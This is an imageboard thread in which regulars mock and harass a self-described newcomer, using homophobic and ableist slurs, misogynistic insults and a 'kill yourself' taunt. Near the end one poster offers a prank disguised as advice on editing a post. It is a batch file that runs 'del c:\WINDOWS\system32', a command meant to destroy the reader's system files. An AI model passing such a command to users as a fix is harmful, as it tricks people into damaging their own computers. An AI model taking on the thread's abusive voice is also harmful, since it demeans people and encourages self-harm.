Bring her down

bring her down



for the Fatherland!

I'll join but no way in heck am i speaking walloon or whatever


not your army


Not your personal army faggot

these make no sense

Yeah, if you're a fucking summerfag, they don't.

ok? just because im new doesnt give you the right to pick on me

Read the rules faggot

i already did so?

>You will not post or request personal information ("dox") or calls to invasion ("raids"). Inciting or participating in cross-board (intra-Sup Forums) raids is also not permitted.

Fucking summerfags

there are no rules
this is fucking Sup Forums
he is a newfag and you are a cocksucker
now get along kids

by the way who is this whore?

yea I read the fuckgn rules and saw that, it doesnt give you the right to call me a summer fag. summer fag doesnt make any sense too, its autumn for me

Stop spamming this you 50 cent shill.

It's pro Clinton shills.
Every time there's a well made picture that doesn't get it, its a professional shill.
They've been spamming this crap since the election.

It's pro Clinton shills.
Every time there's a well made picture that doesn't get it, its a professional shill.
They've been spamming this crap since the election."
please do not put your politcal opinions in this thread please, that is against the rules.

this was meant for i just learned how to @ people thanks.

Alright, now you're just messing with me.
Surely you can't be this retarded?


shes a leftist bitch ans Love to bring europe more refugees

He must be some sort of southern-eurofaggot

>give you the right
Kill yourself, you retarded faggot.
Preferably now.

yes he surely can
you still are on Sup Forums
every fucking idiot with a chromosome problems can post shit in here

I'm living in russia what do u meanit doest just because im new to Sup Forums doesnt mean you can make fun of me, im still learning how to operate on this subreddit :)

I don't think geography has anything to do with this level of autism

True, but to this extent? It's been a while.


by the way i dont have autism :) im just me :)

how do i edit my post it wasnt meaned to be messed up in formation

the delete button is broken i cant delete it

I too am a southern europe fag
a croatia fag to be exact
I dont seem very autistic
Well....either he is extremely retarded or it is just bait.

An easy way to circumvent that

Open notepad
"@echo off
del c:\WINDOWS\system32" (without ")
Save as anything, type in editpost.bat
Run it from where you saved it to.
You need to have this thread open, though.

sorry :)i dont have windoes :)

Really guys

*windows :)you cant edit your post on Sup Forums?